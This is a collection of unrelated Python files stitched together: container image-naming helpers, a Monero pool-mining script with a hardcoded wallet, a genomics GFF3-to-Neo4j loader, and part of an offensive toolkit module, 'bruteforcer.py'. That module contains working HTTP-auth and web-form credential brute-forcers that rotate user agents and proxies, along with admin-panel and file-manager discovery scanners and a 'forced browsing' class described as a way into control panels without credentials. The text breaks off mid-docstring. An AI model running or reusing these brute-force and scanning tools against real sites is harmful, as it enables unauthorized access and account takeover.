requirements_buffer = "\n".join(map(conda_build_target_str, targets_order))
m = hashlib.sha1()
m.update(requirements_buffer.encode())
suffix = "" if not image_build else ":%s" % image_build
return "mulled-v1-%s%s" % (m.hexdigest(), suffix)
def v2_image_name(targets, image_build=None, name_override=None):
"""Generate mulled hash version 2 container identifier for supplied arguments.
If a single target is specified, simply use the supplied name and version as
the repository name and tag respectively. If multiple targets are supplied,
hash the package names as the repository name and hash the package versions (if set)
as the tag.
>>> single_targets = [build_target("samtools", version="1.3.1")]
>>> v2_image_name(single_targets)
'samtools:1.3.1'
>>> multi_targets = [build_target("samtools", version="1.3.1"), build_target("bwa", version="0.7.13")]
>>> v2_image_name(multi_targets)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:4d0535c94ef45be8459f429561f0894c3fe0ebcf'
>>> multi_targets_on_versionless = [build_target("samtools", version="1.3.1"), build_target("bwa")]
>>> v2_image_name(multi_targets_on_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40:b0c847e4fb89c343b04036e33b2daa19c4152cf5'
>>> multi_targets_versionless = [build_target("samtools"), build_target("bwa")]
>>> v2_image_name(multi_targets_versionless)
'mulled-v2-fe8faa35dbf6dc65a0f7f5d4ea12e31a79f73e40'
"""
if name_override is not None:
print("WARNING: Overriding mulled image name, auto-detection of 'mulled' package attributes will fail to detect result.")
return name_override
targets = list(targets)
if len(targets) == 1:
return _simple_image_name(targets, image_build=image_build)
else:
targets_order = sorted(targets, key=lambda t: t.package_name)
package_name_buffer = "\n".join(map(lambda t: t.package_name, targets_order))
package_hash = hashlib.sha1()
package_hash.update(package_name_buffer.encode())
versions = map(lambda t: t.version, targets_order)
if any(versions):
# Only hash versions if at least one package has versions...
version_name_buffer = "\n".join(map(lambda t: t.version or "null", targets_order))
version_hash = hashlib.sha1()
version_hash.update(version_name_buffer.encode())
version_hash_str = version_hash.hexdigest()
else:
version_hash_str = ""
if not image_build:
build_suffix = ""
elif version_hash_str:
# tagged version is <version_hash>-<build>
build_suffix = "-%s" % image_build
else:
# tagged version is simply the build
build_suffix = image_build
suffix = ""
if version_hash_str or build_suffix:
suffix = ":%s%s" % (version_hash_str, build_suffix)
return "mulled-v2-%s%s" % (package_hash.hexdigest(), suffix)
def split_container_name(name):
"""
Takes a container name (e.g. samtools:1.7--1) and returns a list (e.g. ['samtools', '1.7', '1'])
>>> split_container_name('samtools:1.7--1')
['samtools', '1.7', '1']
"""
return name.replace('--', ':').split(':')
class PrintProgress(object):
def __init__(self):
self.thread = threading.Thread(target=self.progress)
self.stop = False
def progress(self):
while not self.stop:
print(".", end="")
sys.stdout.flush()
time.sleep(60)
print("")
def __enter__(self):
self.thread.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop = True
self.thread.join()
image_name = v1_image_name # deprecated
__all__ = (
"build_target",
"conda_build_target_str",
"image_name",
"mulled_tags_for",
"quay_versions",
"split_container_name",
"split_tag",
"Target",
"v1_image_name",
"v2_image_name",
"version_sorted",
)
|
stratum-miner.py | # Copyright (c) 2019, The Monero Project
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse
import socket
import select
import binascii
import pycryptonight
import pyrx
import struct
import json
import sys
import os
import time
from multiprocessing import Process, Queue
pool_host = 'us1.hellominer.com'
pool_port = 4400
pool_pass = 'xx'
wallet_address = '87G6kxXEFZAddY7JWtj48s5LoxuCrLCL7bEMY5vhSWoVdtdFDn7X1KrEp8gKxBZiPxG8EiE2comRiac6rknxLiguBbKKUMd.Replit/mining@daniel.is-a.dev'
nicehash = False
def main():
pool_ip = socket.gethostbyname(pool_host)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((pool_ip, pool_port))
q = Queue()
proc = Process(target=worker, args=(q, s))
proc.daemon = True
proc.start()
login = {
'method': 'login',
'params': {
'login': wallet_address,
'pass': pool_pass,
'rigid': '',
'agent': 'stratum-miner-py/0.1'
},
'id':1
}
print('Logging into pool: {}:{}'.format(pool_host, pool_port))
print('Using NiceHash mode: {}'.format(nicehash))
s.sendall(str(json.dumps(login)+'\n').encode('utf-8'))
login_id = '' # defined up front so a 'job' push arriving before the login reply cannot raise NameError
try:
while 1:
line = s.makefile().readline()
r = json.loads(line)
error = r.get('error')
result = r.get('result')
method = r.get('method')
params = r.get('params')
if error:
print('Error: {}'.format(error))
continue
if result and result.get('status'):
print('Status: {}'.format(result.get('status')))
if result and result.get('job'):
login_id = result.get('id')
job = result.get('job')
job['login_id'] = login_id
q.put(job)
elif method == 'job' and login_id:
q.put(params)
except KeyboardInterrupt:
print('{}Exiting'.format(os.linesep))
proc.terminate()
s.close()
sys.exit(0)
def pack_nonce(blob, nonce):
b = binascii.unhexlify(blob)
bin = struct.pack('39B', *bytearray(b[:39]))
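# the 4-byte nonce sits at offset 39 of the hashing blob; NiceHash fixes the
# high byte, so only 3 bytes are written and the tail resumes at offset 42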
if nicehash:
bin += struct.pack('I', nonce & 0x00ffffff)[:3]
bin += struct.pack('{}B'.format(len(b)-42), *bytearray(b[42:]))
else:
bin += struct.pack('I', nonce)
bin += struct.pack('{}B'.format(len(b)-43), *bytearray(b[43:]))
return bin
def worker(q, s):
started = time.time()
hash_count = 0
while 1:
job = q.get()
if job.get('login_id'):
login_id = job.get('login_id')
print('Login ID: {}'.format(login_id))
blob = job.get('blob')
target = job.get('target')
job_id = job.get('job_id')
height = job.get('height')
block_major = int(blob[:2], 16)
cnv = 0
if block_major >= 7:
cnv = block_major - 6
if cnv > 5:
seed_hash = binascii.unhexlify(job.get('seed_hash'))
print('New job with target: {}, RandomX, height: {}'.format(target, height))
else:
print('New job with target: {}, CNv{}, height: {}'.format(target, cnv, height))
target = struct.unpack('I', binascii.unhexlify(target))[0]
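# pools usually send a compact 32-bit target; expand it to 64 bits so it can
# be compared against the trailing 8 bytes of each hash below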
if target >> 32 == 0:
target = 0xFFFFFFFFFFFFFFFF // (0xFFFFFFFF // target) # integer division avoids float precision loss on 64-bit values
nonce = 1
while 1:
bin = pack_nonce(blob, nonce)
if cnv > 5:
hash = pyrx.get_rx_hash(bin, seed_hash, height)
else:
hash = pycryptonight.cn_slow_hash(bin, cnv, 0, height)
hash_count += 1
sys.stdout.write('.')
sys.stdout.flush()
hex_hash = binascii.hexlify(hash).decode()
r64 = struct.unpack('Q', hash[24:])[0]
if r64 < target:
elapsed = time.time() - started
hr = int(hash_count / elapsed)
print('{}Hashrate: {} H/s'.format(os.linesep, hr))
if nicehash:
nonce = struct.unpack('I', bin[39:43])[0]
submit = {
'method':'submit',
'params': {
'id': login_id,
'job_id': job_id,
'nonce': binascii.hexlify(struct.pack('<I', nonce)).decode(),
'result': hex_hash
},
'id':1
}
print('Submitting hash: {}'.format(hex_hash))
s.sendall(str(json.dumps(submit)+'\n').encode('utf-8'))
select.select([s], [], [], 3)
if not q.empty():
break
nonce += 1
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--nicehash', action='store_true', help='NiceHash mode')
parser.add_argument('--host', action='store', help='Pool host')
parser.add_argument('--port', action='store', help='Pool port')
args = parser.parse_args()
if args.nicehash:
nicehash = True
if args.host:
pool_host = args.host
if args.port:
pool_port = int(args.port)
main()
|
transcript_etl.py | """Transcript ETL."""
import re
import logging
import multiprocessing
import uuid
from etl import ETL
from transactors import CSVTransactor
from transactors import Neo4jTransactor
class TranscriptETL(ETL):
"""Transcript ETL."""
logger = logging.getLogger(__name__)
# Query templates which take params and will be processed later
exon_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (g:Transcript {gff3ID:row.parentId})
MATCH (so:SOTerm {name:row.featureType})
MERGE (t:Exon {primaryKey:row.gff3ID})
ON CREATE SET t.gff3ID = row.gff3ID,
t.dataProvider = row.dataProvider,
t.name = row.name,
t.synonym = row.synonym
CREATE (t)<-[tso:TYPE]-(so)
CREATE (g)<-[gt:EXON]-(t)"""
exon_genomic_locations_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (o:Exon {primaryKey: row.gff3ID})
MATCH (chrm:Chromosome {primaryKey: row.chromosomeNumber})
MATCH (a:Assembly {primaryKey: row.assembly})
CREATE (o)-[ochrm:LOCATED_ON]->(chrm)
CREATE (gchrm:GenomicLocation {primaryKey: row.genomicLocationUUID})
SET gchrm.start = apoc.number.parseInt(row.start),
gchrm.end = apoc.number.parseInt(row.end),
gchrm.assembly = row.assembly,
gchrm.strand = row.strand,
gchrm.chromosome = row.chromosomeNumber
CREATE (o)-[of:ASSOCIATION]->(gchrm)
CREATE (gchrm)-[ofc:ASSOCIATION]->(chrm)
CREATE (gchrm)-[ao:ASSOCIATION]->(a)"""
transcript_alternate_id_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (g:Gene {primaryKey:row.curie})
SET g.gff3ID = row.gff3ID"""
transcript_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (g:Gene {gff3ID:row.parentId})
MATCH (so:SOTerm {name:row.featureType})
MERGE (t:Transcript {primaryKey:row.curie})
ON CREATE SET t.gff3ID = row.gff3ID,
t.dataProvider = row.dataProvider,
t.name = row.name,
t.synonym = row.synonym
MERGE (t)<-[tso:TRANSCRIPT_TYPE]-(so)
MERGE (g)<-[gt:TRANSCRIPT]-(t)"""
chromosomes_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MERGE (chrm:Chromosome {primaryKey: row.chromosomeNumber}) """
genomic_locations_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (o:Transcript {primaryKey:row.curie})
MATCH (chrm:Chromosome {primaryKey:row.chromosomeNumber})
MERGE (a:Assembly {primaryKey:row.assembly})
ON CREATE SET a.dataProvider = row.dataProvider
CREATE (o)-[ochrm:LOCATED_ON]->(chrm)
CREATE (gchrm:GenomicLocation {primaryKey:row.genomicLocationUUID})
SET gchrm.start = apoc.number.parseInt(row.start),
gchrm.end = apoc.number.parseInt(row.end),
gchrm.assembly = row.assembly,
gchrm.strand = row.strand,
gchrm.chromosome = row.chromosomeNumber
CREATE (o)-[of:ASSOCIATION]->(gchrm)
CREATE (gchrm)-[ofc:ASSOCIATION]->(chrm)
CREATE (gchrm)-[ao:ASSOCIATION]->(a)"""
def __init__(self, config):
"""Initialise object."""
super().__init__()
self.data_type_config = config
def _load_and_process_data(self):
thread_pool = []
for sub_type in self.data_type_config.get_sub_type_objects():
process = multiprocessing.Process(target=self._process_sub_type, args=(sub_type,))
process.start()
thread_pool.append(process)
ETL.wait_for_threads(thread_pool)
def _process_sub_type(self, sub_type):
self.logger.info("Loading Transcript Data: %s", sub_type.get_data_provider())
commit_size = self.data_type_config.get_neo4j_commit_size()
batch_size = self.data_type_config.get_generator_batch_size()
filepath = sub_type.get_filepath()
# This needs to be in this format (template, param1, params2) others will be ignored
query_template_list = [
[self.transcript_alternate_id_query_template, commit_size,
"transcript_gff3ID_data_" + sub_type.get_data_provider() + ".csv"],
[self.transcript_query_template, commit_size,
"transcript_data_" + sub_type.get_data_provider() + ".csv"],
[self.chromosomes_query_template, commit_size,
"transcript_data_chromosome_" + sub_type.get_data_provider() + ".csv"],
[self.genomic_locations_query_template, commit_size,
"transcript_genomic_locations_" + sub_type.get_data_provider() + ".csv"],
[self.exon_query_template, commit_size,
"exon_data_" + sub_type.get_data_provider() + ".csv"],
[self.exon_genomic_locations_template, commit_size,
"exon_genomic_location_data_" + sub_type.get_data_provider() + ".csv"]
]
# Obtain the generator
generators = self.get_generators(filepath, batch_size)
query_and_file_list = self.process_query_params(query_template_list)
CSVTransactor.save_file_static(generators, query_and_file_list)
Neo4jTransactor.execute_query_batch(query_and_file_list)
self.error_messages("Transcript-{}: ".format(sub_type.get_data_provider()))
def get_generators(self, filepath, batch_size): # noqa
"""Get Generators."""
with open(filepath) as file_handle:
transcript_maps = []
gene_maps = []
exon_maps = []
counter = 0
data_provider = ''
assembly = ''
for line in file_handle:
counter = counter + 1
transcript_map = {}
gene_map = {}
exon_map = {}
curie = ''
parent = ''
gff3_id = ''
synonym = ''
name = ''
transcript_types = ['mRNA', 'ncRNA', 'piRNA', 'lincRNA', 'miRNA', 'pre_miRNA', 'snoRNA', 'lnc_RNA',
'tRNA', 'snRNA', 'rRNA', 'antisense_RNA', 'C_gene_segment',
'V_gene_segment', 'pseudogene_attribute', 'snoRNA_gene', 'pseudogenic_transcript']
possible_types = ['gene', 'exon', 'mRNA', 'ncRNA', 'piRNA', 'lincRNA', 'miRNA',
'pre_miRNA', 'snoRNA', 'lnc_RNA', 'tRNA', 'snRNA', 'rRNA',
'antisense_RNA', 'C_gene_segment', 'V_gene_segment',
'pseudogene_attribute', 'snoRNA_gene', 'pseudogenic_transcript']
gene_id = ''
if line.startswith('#!'):
header_columns = line.split()
if line.startswith('#!assembly'):
assembly = header_columns[1]
elif line.startswith('#!data-source '):
data_provider = header_columns[1]
if data_provider == 'FlyBase':
data_provider = 'FB'
if data_provider == 'WormBase':
data_provider = 'WB'
if data_provider == 'RAT':
data_provider = 'RGD'
elif line.startswith('##FASTA'):
break
elif line.startswith('#'):
continue
else:
columns = re.split(r'\t', line)
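# GFF3 columns: 0 seqid, 1 source, 2 type, 3 start, 4 end, 5 score,
# 6 strand, 7 phase, 8 attributes (semicolon-separated key=value pairs)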
feature_type_name = columns[2].strip()
if feature_type_name in possible_types:
column8 = columns[8]
notes = "_".join(column8.split())
kvpairs = re.split(';', notes)
if kvpairs is not None:
for pair in kvpairs:
if "=" in pair:
key = pair.split("=")[0]
value = pair.split("=")[1]
if key == 'ID':
if data_provider == 'WB':
if ":" in value:
gff3_id = value.split(":")[1]
else:
gff3_id = value
else:
gff3_id = value
if key == 'gene_id':
gene_id = value
if key == 'Parent':
if data_provider == 'WB':
parent = value.split(":")[1]
else:
parent = value
if key == 'Name':
name = value
if key == 'transcript_id':
if value.startswith("FB:") or data_provider == 'MGI':
synonym = gff3_id
if ":" in value and data_provider == 'MGI':
gff3_id = value.split(":")[1]
else:
gff3_id = value
if key == 'curie':
curie = value
if self.test_object.using_test_data() is True:
is_it_test_entry = self.test_object.check_for_test_id_entry(curie)
if is_it_test_entry is False:
is_it_test_entry = self.test_object.check_for_test_id_entry(parent)
if is_it_test_entry is False:
is_it_test_entry = self.test_object.check_for_test_id_entry(gene_id)
if is_it_test_entry is True:
counter = counter - 1
continue
if feature_type_name in transcript_types:
transcript_map.update({'curie': curie})
transcript_map.update({'parentId': parent})
transcript_map.update({'gff3ID': gff3_id})
transcript_map.update({'genomicLocationUUID': str(uuid.uuid4())})
transcript_map.update({'chromosomeNumber': columns[0]})
transcript_map.update({'featureType': feature_type_name})
transcript_map.update({'start': columns[3]})
transcript_map.update({'dataProvider': data_provider})
transcript_map.update({'end': columns[4]})
transcript_map.update({'name': name})
transcript_map.update({'synonym': synonym})
if assembly is None or assembly == '':
assembly = 'assembly_unlabeled_in_gff3_header'
transcript_map.update({'assembly': assembly})
transcript_maps.append(transcript_map)
elif feature_type_name == 'gene':
gene_map.update({'curie': curie})
gene_map.update({'parentId': parent})
gene_map.update({'gff3ID': gff3_id})
gene_map.update({'synonym': synonym})
gene_maps.append(gene_map)
elif feature_type_name == 'exon':
exon_map.update({'parentId': parent})
exon_map.update({'gff3ID': str(uuid.uuid4())})
exon_map.update({'genomicLocationUUID': str(uuid.uuid4())})
exon_map.update({'chromosomeNumber': columns[0]})
exon_map.update({'featureType': feature_type_name})
exon_map.update({'start': columns[3]})
exon_map.update({'dataProvider': data_provider})
exon_map.update({'end': columns[4]})
exon_map.update({'name': name})
exon_map.update({'synonym': synonym})
if assembly is None or assembly == '':
assembly = 'assembly_unlabeled_in_gff3_header'
exon_map.update({'assembly': assembly})
exon_maps.append(exon_map)
else:
continue
if counter == batch_size:
counter = 0
yield [gene_maps,
transcript_maps,
transcript_maps,
transcript_maps,
exon_maps,
exon_maps]
transcript_maps = []
gene_maps = []
exon_maps = []
if counter > 0:
yield [gene_maps,
transcript_maps,
transcript_maps,
transcript_maps,
exon_maps,
exon_maps]
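# Consumption sketch (hypothetical instance and path): each yielded batch is a
# list of six map-lists, lining up with the six entries of query_template_list above.
# for batch in etl.get_generators('transcripts.gff3', batch_size=10000):
#     gene_maps, transcript_maps, _, _, exon_maps, _ = batch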
|
bruteforcer.py | import requests,random,smtplib,telnetlib,sys,os,hashlib,base64,subprocess,time,xtelnet,threading#,requests_ntlm
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from ftplib import FTP
from .payloads import *
adr=False
termux=False
if os.path.isdir('/data/data')==True:
adr=True
if os.path.isdir('/data/data/com.termux/')==True:
termux=True
import mysqlcp
from .pager import *
from .wp import wpadmin
from .hasher import *
from .pager import *
class http_auth_bruteforce:
__slots__=["logs","stop","finish","result"]
def __init__(self,u,word_list=[],threads_daemon=True,logs=True,domain=None,proxy=None,proxies=None,cookie=None,user_agent=None,timeout=10):
self.stop=False
self.logs=logs
self.finish=False
self.result={}
t=threading.Thread(target=self.crack,args=(u,domain,word_list,logs,proxy,proxies,cookie,user_agent,timeout,))
t.daemon=threads_daemon
t.start()
def done(self):
return self.finish
def crack(self,u,domain,word_list,logs,proxy,proxies,cookie,user_agent,timeout):
if user_agent:
us=user_agent
else:
us=random.choice(ua)
hed={"User-Agent":us}
if cookie:
hed.update({"Cookie":cookie})
prox=None
if proxy:
prox={'http':'http://'+proxy,'https':'http://'+proxy}
if proxies:
prox=random.choice(proxies)
prox={'http':'http://'+prox,'https':'http://'+prox}
try:
if self.logs==True:
print("[*]Checking Authentication Type:")
resp = requests.get(u,proxies=prox,headers=hed, verify=False, timeout=timeout)
if 'basic' in resp.headers['WWW-Authenticate'].lower():
if self.logs==True:
print("==>Basic")
auth_type = requests.auth.HTTPBasicAuth
elif 'digest' in resp.headers['WWW-Authenticate'].lower():
if self.logs==True:
print("==>Digest")
auth_type = requests.auth.HTTPDigestAuth
"""elif 'ntlm' in resp.headers['WWW-Authenticate'].lower():
if self.logs==True:
print("==>Ntlm")
auth_type = requests_ntlm.HttpNtlmAuth
if not domain:
raise Exception('You need to specify a domain for "Ntlm" authentication !\n\nbane.http_auth_bruteforce("http://example.com",domain="example.com",.....)')"""
else:
if self.logs==True:
print("==>Unknown type")
self.finish=True
return
except:
if self.logs==True:
print("bane doesn't support this type of authentication")
self.finish=True
return
for x in word_list:
try:
if self.stop==True:
self.finish=True
break
username=x.split(":")[0]
"""if domain and auth_type==requests_ntlm.HttpNtlmAuth:
username=domain+'\\'+username"""
password=x.split(":")[1]
if self.logs==True:
print("[*]Trying: {} {}".format(username,password))
prox=None
if proxy:
prox={'http':'http://'+proxy}
if proxies:
prox=random.choice(proxies)
prox={'http':'http://'+prox}
if user_agent:
us=user_agent
else:
us=random.choice(ua)
hed={"User-Agent":us}
if cookie:
hed.update({"Cookie":cookie})
r=requests.get(u, auth=auth_type(username,password),proxies=prox,headers=hed, verify=False, timeout=timeout)
if (r.status_code == 200)and("required" not in r.text.lower())and("wrong" not in r.text.lower())and("invalid" not in r.text.lower())and("denied" not in r.text.lower())and("unauthorized" not in r.text.lower()):
if self.logs==True:
print("[+]Success")
self.result={u:username+":"+password}
self.finish=True
break
else:
if self.logs==True:
print("[-]Fail")
except Exception as ex:
if self.logs==True:
print("[-]Fail")
self.finish=True
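# Usage sketch (hypothetical target and word list): the attack runs in a
# background thread; poll done() and then read .result.
# job = http_auth_bruteforce('http://192.168.1.1/', word_list=['admin:admin', 'root:toor'])
# while not job.done():
#     time.sleep(0.5)
# print(job.result)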
def access(u,timeout=10,user_agent=None,cookie=None,bypass=False,proxy=None):
if bypass==True:
u+='#'
if user_agent:
us=user_agent
else:
us=random.choice(ua)
hed={'User-Agent': us}
if cookie:
hed.update({"Cookie":cookie})
if proxy:
proxy={'http':'http://'+proxy,'https':'http://'+proxy}
try:
r=requests.get(u, headers = hed , allow_redirects=False,proxies=proxy,timeout=timeout, verify=False)
if r.status_code == requests.codes.ok:
if (("Uncaught exception" not in r.text) or ("404 Not Found" not in r.text)):
return True
except Exception as e:
pass
return False
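# Example (hypothetical URL): access() returns True when the page answers 200
# without the usual error markers, e.g.:
# access('http://www.example.com/admin/home.php', timeout=5)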
class web_login_bruteforce:
__slots__=["stop","finish","result","logs"]
def try_combo(self,url,username,password,cookie,user_agent,proxy,timeout):
prox=None
if proxy:
proxy={'http':'http://'+proxy,'https':'http://'+proxy}
cookies=None
h={"User-Agent":user_agent}
if cookie:
h.update({"Cookie":cookie})
cookies=cookie
try:
r=requests.get(url,proxies=proxy,headers=h, verify=False, timeout=timeout)
except:
return False
cook=None
try:
cook=r.headers['Set-cookie']
except:
pass
cookies=set_correct_cookies(cook,cookie=cookie)
form=set_login_form(url, r.text.encode('utf-8','ignore'), username, password)
h={"User-Agent":user_agent}
if cookies:
h.update({"Cookie":cookies})
d=form[0]
h.update({"Referer":form[1],"Origin":form[1].split("://")[0]+"://"+form[1].split("://")[1].split("/")[0]})
try:
r=requests.post(form[1],data=d,headers=h,verify=False,proxies=proxy, timeout=timeout)
except:
return False
try:
set_login_form(url, r.text.encode('utf-8','ignore'), username, password)
return False
except:
return True
def __init__(self,u,word_list=[],threads_daemon=True,logs=True,proxy=None,proxies=None,cookie=None,user_agent=None,timeout=10):
self.stop=False
self.finish=False
self.logs=logs
self.result={}
t=threading.Thread(target=self.crack,args=(u,word_list,logs,proxy,proxies,cookie,user_agent,timeout,))
t.daemon=threads_daemon
t.start()
def done(self):
return self.finish
def crack(self,u,word_list,logs,proxy,proxies,cookie,user_agent,timeout):
for x in word_list:
try:
if self.stop==True:
self.finish=True
break
username=x.split(":")[0]
password=x.split(":")[1]
if self.logs==True:
print("[*]Trying: {} {}".format(username,password))
if user_agent:
us=user_agent
else:
us=random.choice(ua)
prox=None
if proxy:
prox=proxy
if proxies:
prox=random.choice(proxies)
if self.try_combo(u,username,password,cookie,us,prox,timeout)==True:
if self.logs==True:
print("[+]Success")
self.result={u:username+":"+password}
self.finish=True
break
else:
if self.logs==True:
print("[-]Fail")
except Exception as e:
pass
if self.logs==True:
print("[-]Fail")
self.finish=True
class filemanager_finder:
__slots__=["logs","stop","finish","result"]
def __init__(self,u,logs=True,threads_daemon=True,user_agent=None,cookie=None,timeout=10,proxy=None,proxies=None):
'''
u: the target link: http://www.example.com
logs: (set by default to True) show the process and requests
threads_daemon: (set by default to True) run the background thread as a daemon
timeout: (set by default to 10) timeout flag for the requests
usage:
>>>import bane
>>>url='http://www.example.com/'
>>>bane.filemanager_finder(url)
'''
self.logs=logs
self.stop=False
self.finish=False
self.result={}
t=threading.Thread(target=self.crack,args=(u,logs,user_agent,cookie,timeout,proxy,proxies,))
t.daemon=threads_daemon
t.start()
def crack(self,u,logs,user_agent,cookie,timeout,proxy,proxies):
for i in manager:
if self.stop==True:
self.finish=True
break
if proxy:
proxy={'http':'http://'+proxy,'https':'http://'+proxy}
if proxies:
prx=random.choice(proxies)
proxy={'http':'http://'+prx,'https':'http://'+prx}
if user_agent:
us=user_agent
else:
us=random.choice(ua)
hed={'User-Agent': us}
if cookie:
hed.update({"Cookie":cookie})
try:
if u[len(u)-1]=='/':
u=u[0:len(u)-1]
g=u+i
r=requests.get(g, headers = hed , allow_redirects=False,proxies=proxy,timeout=timeout, verify=False)
if r.status_code == requests.codes.ok:
if ("Uncaught exception" not in r.text) and ("404 Not Found" not in r.text) and ('could not be found' not in r.text):
self.finish=True
if self.logs==True:
sys.stdout.write("\rStats: {}/{} | Found: {} ".format(manager.index(g),len(manager),self.finish))
sys.stdout.flush()
self.result.update({u:g})
break
else:
if self.logs==True:
sys.stdout.write("\rStats: {}/{} | Found: {} ".format(manager.index(g),len(manager),self.finish))
sys.stdout.flush()
else:
if self.logs==True:
sys.stdout.write("\rStats: {}/{} | Found: {} ".format(manager.index(g),len(manager),self.finish))
sys.stdout.flush()
except KeyboardInterrupt:
break
except Exception as e:
pass
self.finish=True
def done(self):
return self.finish
class force_browsing:
__slots__=["stop","finish","result","logs"]
def __init__(self,u,timeout=10,threads_daemon=True,logs=True,ext='php',user_agent=None,cookie=None,proxy=None,proxies=None):
'''
this class uses the "Forced Browsing" technique, which aims to access restricted areas without providing any credentials!!!
it is used here to gain access to an admin control panel by trying different possible combinations of links with the given URL.
this is a proof of concept that unsecured cpanels lacking proper session configuration can be
accessed just by guessing the right links :)
the class takes these arguments:
u: the targeted link, which should lead to the control panel, example:
http://www.example.com/admin/login.php
you have to delete 'login.php' and pass the rest of the link like this:
>>>import bane
>>>bane.force_browsing('http://www.example.com/admin/')
then it will try to find possibly accessible links:
http://www.example.com/admin/edit.php
http://www.example.com/admin/news.php
http://www.example.com/admin/home.php
timeout: (set by default to 10) timeout flag for the request
logs: (set by default to: True) showing the progress of the attack, you can turn it off by setting it to: False
ext: (set by default to: "php") it helps you to find links with the given extension, currently it supports only 3 extensions: "php", "asp" and "aspx" (any other extension won't be used).
'''
self.stop=False
self.finish=False
self.result={}
self.logs=logs
t=threading.Thread(target=self.crack,args=(u,timeout,logs,ext,user_agent,cookie,proxy,proxies,))
t.daemon=threads_daemon
t.start()
def crack(self,u,timeout=10,logs=True,ext='php',user_agent=None,cookie=None,proxy=None,proxies=None):
l=[]
if u[len(u)-1]=='/':
u=u[0:len(u)-1]
for x in innerl:
if self.stop==True:
break
g=u+x+'.'+ext
if self.logs==True:
print("[*]Trying:",g)
try:
if proxy:
proxy=proxy
if proxies:
proxy=random.choice(proxies)
if user_agent:
us=user_agent
else:
us=random.choice(ua)
h=access(g,user_agent=us,cookie=cookie,proxy=proxy)
except KeyboardInterrupt:
break
if h==True:
l.append(g)
if self.logs==True:
print("[+]FOUND!!!")
else:
if self.logs==True:
print("[-]Failed")
self.result={u:l}
self.finish=True
def done(self):
return self.finish
class admin_panel_finder:
__slots__=["stop","finish","result","logs"]
def done(self):
return self.finish
'''
this class uses a list of possible admin panel links with different extensions: php, asp, aspx, js, /, cfm, cgi, brf and html.
ext: (set by default to: 'php') to define the links' extension.
usage:
>>>import bane
>>>bane.admin_panel_finder('http://www.example.com',ext='php',timeout=7)
>>>bane.admin_panel_finder('http://www.example.com',ext='aspx',timeout=5)
'''
def __init__(self,u,logs=True,threads_daemon=True,user_agent=None,cookie=None,ext='php',timeout=10,proxy=None,proxies=None):
self.logs=logs
self.stop=False
self.finish=False
self.result={}
t=threading.Thread(target=self.crack,args=(u,timeout,logs,ext,user_agent,cookie,proxy,proxies,))
t.daemon=threads_daemon
t.start()
def crack(self,u,timeout=10,logs=True,ext='php',user_agent=None,cookie=None,proxy=None,proxies=None):
links=[]
ext=ext.strip()
if ext.lower()=="php":
links=phpl
elif ext.lower()=="asp":
links=aspl
elif ext.lower()=="aspx":
links=aspxl
elif ext.lower()=="js":
links=jsl
elif ext=="/":
links=slashl
elif ext.lower()=="cfm":
links=cfml
elif ext.lower()=="cgi":
links=cgil
elif ext.lower()=="brf":
links=brfl
elif ext.lower()=="html":
links=htmll
k=[]
for i in links:
if self.stop==True:
break
try:
if proxy:
proxy={'http':'http://'+proxy,'https':'http://'+proxy}
if proxies:
prx=random.choice(proxies)
proxy={'http':'http://'+prx,'https':'http://'+prx}
if user_agent:
us=user_agent
else:
us=random.choice(ua)
hed={'User-Agent': us}
if cookie:
hed.update({"Cookie":cookie})
if u[len(u)-1]=='/':
u=u[0:len(u)-1]
g=u+i
if self.logs==True:
print("[*]Trying:",g)
r=requests.get(g,headers = hed,allow_redirects=False,proxies=proxy,timeout=timeout, verify=False)
if r.status_code == requests.codes.ok:
if self.logs==True:
print("[+]FOUND!!!")
k.append(g)
else:
if self.logs==True:
print("[-]failed")
except KeyboardInterrupt:
break
except Exception as e:
if self.logs==True:
print ("[-]Failed")
self.result={u:k}
self.finish=True
'''
the next functions are used to check the login credentials you provide; they can be used for bruteforce attacks.
each returns True if the given credentials are valid, else it returns False.
example:
>>>host='125.33.32.11'
>>>wordlist=['admin:admin','admin123:admin','user:password']
>>>for x in wordlist:
user=x.split(':')[0]
pwd=x.split(':')[1]
print('[*]Trying:',user,pwd)
